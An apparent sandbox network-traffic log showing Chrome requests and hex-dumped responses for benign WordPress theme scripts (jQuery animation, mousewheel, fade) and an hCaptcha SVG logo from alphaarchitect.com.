                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2b6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdfa6b9e04-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC701INData Raw: 32 62 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 2c 61 3d 30 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 26 26 28 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6d 2c 65 29 2c 6a 51 75 65 72 79 2e 66 78 2e 74 69 63 6b 28 29 29 7d 2c 72 3d 5b 22 6d 73 22 2c 22 6d 6f 7a 22 2c 22 77 65 62 6b 69 74 22 2c 22 6f 22 5d 2c 6f 3d 30 2c 75 3d 72 2e 6c 65 6e 67 74 68 3b 6f 3c 75 26 26 21 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3b 2b 2b 6f 29 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3d 6e 5b 72 5b 6f 5d 2b 22 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 22 5d 2c 6e 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61
                                                                                                                                                                                                                                                                        Data Ascii: 2b6!function(e,n,t){for(var i,a=0,m=function(e){i&&(n.requestAnimationFrame(m,e),jQuery.fx.tick())},r=["ms","moz","webkit","o"],o=0,u=r.length;o<u&&!n.requestAnimationFrame;++o)n.requestAnimationFrame=n[r[o]+"RequestAnimationFrame"],n.cancelAnimationFra
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        16192.168.2.449760141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC840OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-a40"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdfeb142df-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC878INData Raw: 61 34 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 3a 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 69 2c 6e 3d 5b 22 77 68 65 65 6c 22 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 2c 22 44 4f 4d 4d 6f 75 73 65 53 63 72 6f 6c 6c 22 2c 22 4d 6f 7a 4d 6f 75 73 65 50 69 78 65 6c 53 63 72 6f 6c 6c 22 5d 2c 6f 3d 22 6f 6e 77 68 65 65 6c 22 69 6e 20 64 6f 63 75 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: a40!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(e){var t,i,n=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],o="onwheel"in document||document.document
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 65 77 68 65 65 6c 3d 6e 75 6c 6c 3b 65 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2c 22 6d 6f 75 73 65 77 68 65 65 6c 2d 6c 69 6e 65 2d 68 65 69 67 68 74 22 29 2c 65 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2c 22 6d 6f 75 73 65 77 68 65 65 6c 2d 70 61 67 65 2d 68 65 69 67 68 74 22 29 7d 2c 67 65 74 4c 69 6e 65 48 65 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 65 28 74 29 2c 6e 3d 69 5b 22 6f 66 66 73 65 74 50 61 72 65 6e 74 22 69 6e 20 65 2e 66 6e 3f 22 6f 66 66 73 65 74 50 61 72 65 6e 74 22 3a 22 70 61 72 65 6e 74 22 5d 28 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 7c 7c 28 6e 3d 65 28 22 62 6f 64 79 22 29 29 2c 70 61 72 73 65 49 6e 74 28 6e 2e 63 73 73 28 22 66 6f 6e 74 53 69 7a 65 22 29 2c 31 30 29 7c 7c 70
                                                                                                                                                                                                                                                                        Data Ascii: ewheel=null;e.removeData(this,"mousewheel-line-height"),e.removeData(this,"mousewheel-page-height")},getLineHeight:function(t){var i=e(t),n=i["offsetParent"in e.fn?"offsetParent":"parent"]();return n.length||(n=e("body")),parseInt(n.css("fontSize"),10)||p
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC384INData Raw: 61 4d 6f 64 65 3d 30 2c 68 2e 75 6e 73 68 69 66 74 28 6e 2c 66 2c 64 2c 63 29 2c 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 72 2c 32 30 30 29 2c 28 65 2e 65 76 65 6e 74 2e 64 69 73 70 61 74 63 68 7c 7c 65 2e 65 76 65 6e 74 2e 68 61 6e 64 6c 65 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 69 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 61 2e 73 65 74 74 69 6e 67 73 2e 61 64 6a 75 73 74 4f 6c 64 44 65 6c 74 61 73 26 26 22 6d 6f 75 73 65 77 68 65 65 6c 22 3d 3d 3d 65 2e 74 79 70 65 26 26 74 25 31 32 30 3d 3d 30 7d 65 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 6d 6f 75 73 65 77 68 65 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                                        Data Ascii: aMode=0,h.unshift(n,f,d,c),t&&clearTimeout(t),t=setTimeout(r,200),(e.event.dispatch||e.event.handle).apply(this,h)}}function r(){i=null}function u(e,t){return a.settings.adjustOldDeltas&&"mousewheel"===e.type&&t%120==0}e.fn.extend({mousewheel:function(e){
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        17192.168.2.449761141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC834OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-489"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdfb348c1e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC878INData Raw: 34 38 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 66 3d 74 2e 65 78 74 65 6e 64 28 7b 74 79 70 65 3a 22 6f 70 61 63 69 74 79 22 2c 6f 66 66 73 65 74 3a 30 2c 65 6e 64 4f 66 66 73 65 74 3a 22 22 7d 2c 65 29 3b 74 28 74 68 69 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 2c 72 2c 6f 3d 74 68 69 73 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 73 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 2c 6c 2c 70 2c 63 3b 65 3d 74 28 6f 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2c 74 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 61 64 6d 69 6e 2d 62 61 72
                                                                                                                                                                                                                                                                        Data Ascii: 489!function(t){"use strict";t.fn.fusionScroller=function(e){var f=t.extend({type:"opacity",offset:0,endOffset:""},e);t(this).each(function(){var e,i,r,o=this;t(window).on("scroll",function(){var s,l,p,c;e=t(o).offset().top,t("body").hasClass("admin-bar
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC290INData Raw: 74 28 6f 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 31 7d 29 3a 22 62 6c 75 72 22 3d 3d 3d 66 2e 74 79 70 65 3f 28 63 3d 22 62 6c 75 72 28 30 70 78 29 22 2c 74 28 6f 29 2e 63 73 73 28 7b 22 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 73 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6f 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 6f 7a 2d 66 69 6c 74 65 72 22 3a 63 2c 66 69 6c 74 65 72 3a 63 7d 29 29 3a 22 66 61 64 69 6e 67 5f 62 6c 75 72 22 3d 3d 3d 66 2e 74 79 70 65 26 26 28 63 3d 22 62 6c 75 72 28 30 70 78 29 22 2c 74 28 6f 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 31 2c 22 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 73 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6f 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 6f 7a 2d 66 69 6c
                                                                                                                                                                                                                                                                        Data Ascii: t(o).css({opacity:1}):"blur"===f.type?(c="blur(0px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c})):"fading_blur"===f.type&&(c="blur(0px)",t(o).css({opacity:1,"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-fil
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        18192.168.2.449764141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC591OUTGET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/images/hcaptcha-div-logo.svg HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:49:37 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67585501-2162"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdff0342c0-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC886INData Raw: 32 31 36 32 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 34 22 20 68 65 69 67 68 74 3d 22 34 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 20 34 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 64 3d 22 4d 33 30 20 32 38 48 32 36 56 33 32 48 33 30 56 32 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 37 34 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 64 3d 22 4d 32 36 20 32 38 48 32 32 56 33 32 48 32 36 56 32 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 37 34 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22
                                                                                                                                                                                                                                                                        Data Ascii: 2162<svg xmlns="http://www.w3.org/2000/svg" width="44" height="46" viewBox="0 0 44 46" fill="none"> <path opacity="0.5" d="M30 28H26V32H30V28Z" fill="#0074BF"/> <path opacity="0.7" d="M26 28H22V32H26V28Z" fill="#0074BF"/> <path opacity="0.7"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 36 20 32 30 48 32 32 56 32 34 48 32 36 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 32 20 32 30 48 31 38 56 32 34 48 32 32 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 20 32 30 48 31 34 56 32 34 48 31 38 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 38 22 20 64 3d 22 4d 31 34 20 32 30 48 31 30 56 32 34 48 31 34 56 32 30 5a 22 20 66 69 6c 6c 3d 22 23 30 30 38 46 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d
                                                                                                                                                                                                                                                                        Data Ascii: " fill="#008FBF"/> <path d="M26 20H22V24H26V20Z" fill="#008FBF"/> <path d="M22 20H18V24H22V20Z" fill="#008FBF"/> <path d="M18 20H14V24H18V20Z" fill="#008FBF"/> <path opacity="0.8" d="M14 20H10V24H14V20Z" fill="#008FBF"/> <path opacity=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 32 48 32 36 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 32 20 38 48 31 38 56 31 32 48 32 32 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 38 20 38 48 31 34 56 31 32 48 31 38 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 38 22 20 64 3d 22 4d 31 34 20 38 48 31 30 56 31 32 48 31 34 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 64 3d 22 4d 31 30 20 38 48 36 56 31 32 48 31 30 56 38 5a 22 20 66 69 6c 6c 3d 22 23 30 30 42 39 42 46 22 2f 3e 0a 20 20 20 20 3c 70
                                                                                                                                                                                                                                                                        Data Ascii: 2H26V8Z" fill="#00B9BF"/> <path d="M22 8H18V12H22V8Z" fill="#00B9BF"/> <path d="M18 8H14V12H18V8Z" fill="#00B9BF"/> <path opacity="0.8" d="M14 8H10V12H14V8Z" fill="#00B9BF"/> <path opacity="0.5" d="M10 8H6V12H10V8Z" fill="#00B9BF"/> <p
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 20 31 37 2e 30 38 38 36 4c 32 34 2e 39 31 30 37 20 31 39 2e 38 37 33 31 43 32 34 2e 38 33 39 31 20 31 39 2e 39 33 30 34 20 32 34 2e 37 33 31 38 20 31 39 2e 39 32 33 32 20 32 34 2e 36 36 37 33 20 31 39 2e 38 35 31 37 43 32 34 2e 36 36 37 33 20 31 39 2e 38 35 31 37 20 32 34 2e 36 36 37 33 20 31 39 2e 38 34 34 35 20 32 34 2e 36 36 30 32 20 31 39 2e 38 34 34 35 43 32 34 2e 35 36 20 31 39 2e 37 32 32 38 20 32 34 2e 35 34 35 36 20 31 39 2e 34 30 37 39 20 32 34 2e 36 39 36 20 31 39 2e 32 38 36 32 4c 33 30 2e 35 36 35 37 20 31 34 2e 33 30 34 43 33 31 2e 30 37 34 20 31 33 2e 38 34 35 39 20 33 31 2e 31 34 35 36 20 31 33 2e 31 38 30 32 20 33 30 2e 37 33 30 34 20 31 32 2e 37 32 39 32 43 33 30 2e 33 32 39 35 20 31 32 2e 32 38 35 34 20 32 39 2e 36 39 32 34 20 31 32 2e
                                                                                                                                                                                                                                                                        Data Ascii: 17.0886L24.9107 19.8731C24.8391 19.9304 24.7318 19.9232 24.6673 19.8517C24.6673 19.8517 24.6673 19.8445 24.6602 19.8445C24.56 19.7228 24.5456 19.4079 24.696 19.2862L30.5657 14.304C31.074 13.8459 31.1456 13.1802 30.7304 12.7292C30.3295 12.2854 29.6924 12.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 34 33 2e 37 38 38 32 20 39 2e 35 31 33 33 37 20 34 33 2e 37 38 38 32 43 37 2e 34 32 30 36 39 20 34 33 2e 37 38 38 32 20 35 2e 37 37 36 31 32 20 34 32 2e 33 32 32 38 20 35 2e 37 37 36 31 32 20 33 39 2e 38 39 34 31 43 35 2e 37 37 36 31 32 20 33 37 2e 34 35 36 34 20 37 2e 34 33 38 36 31 20 33 36 20 39 2e 35 30 38 38 39 20 33 36 43 31 30 2e 39 37 34 32 20 33 36 20 31 31 2e 37 36 37 34 20 33 36 2e 36 34 35 33 20 31 31 2e 39 35 35 36 20 33 36 2e 38 35 31 34 4c 31 31 2e 34 34 30 32 20 33 38 2e 33 31 36 37 43 31 31 2e 33 30 35 38 20 33 38 2e 31 32 38 35 20 31 30 2e 35 34 34 20 33 37 2e 35 32 38 31 20 39 2e 36 30 32 39 39 20 33 37 2e 35 32 38 31 43 38 2e 33 39 37 35 37 20 33 37 2e 35 32 38 31 20 37 2e 34 36 35 35 20 33 38 2e 33 37 39 35 20 37 2e 34 36 35 35 20 33
                                                                                                                                                                                                                                                                        Data Ascii: 43.7882 9.51337 43.7882C7.42069 43.7882 5.77612 42.3228 5.77612 39.8941C5.77612 37.4564 7.43861 36 9.50889 36C10.9742 36 11.7674 36.6453 11.9556 36.8514L11.4402 38.3167C11.3058 38.1285 10.544 37.5281 9.60299 37.5281C8.39757 37.5281 7.4655 38.3795 7.4655 3
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 39 2e 35 34 39 43 32 30 2e 34 32 34 39 20 33 39 2e 35 34 39 20 31 39 2e 39 34 30 39 20 34 30 2e 31 31 38 31 20 31 39 2e 39 34 30 39 20 34 30 2e 39 34 37 31 43 31 39 2e 39 34 30 39 20 34 31 2e 37 37 36 32 20 32 30 2e 34 32 34 39 20 34 32 2e 33 34 35 33 20 32 31 2e 31 32 38 34 20 34 32 2e 33 34 35 33 43 32 31 2e 38 34 30 39 20 34 32 2e 33 34 35 33 20 32 32 2e 33 32 34 39 20 34 31 2e 37 37 36 32 20 32 32 2e 33 32 34 39 20 34 30 2e 39 34 37 31 43 32 32 2e 33 32 34 39 20 34 30 2e 31 31 38 31 20 32 31 2e 38 34 30 39 20 33 39 2e 35 34 39 20 32 31 2e 31 32 38 34 20 33 39 2e 35 34 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 35 35 35 35 35 35 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 37 2e 38 33 32 31 20 33 39 2e 36 30 32 38 48 32
                                                                                                                                                                                                                                                                        Data Ascii: 9.549C20.4249 39.549 19.9409 40.1181 19.9409 40.9471C19.9409 41.7762 20.4249 42.3453 21.1284 42.3453C21.8409 42.3453 22.3249 41.7762 22.3249 40.9471C22.3249 40.1181 21.8409 39.549 21.1284 39.549Z" fill="#555555"/> <path d="M27.8321 39.6028H2
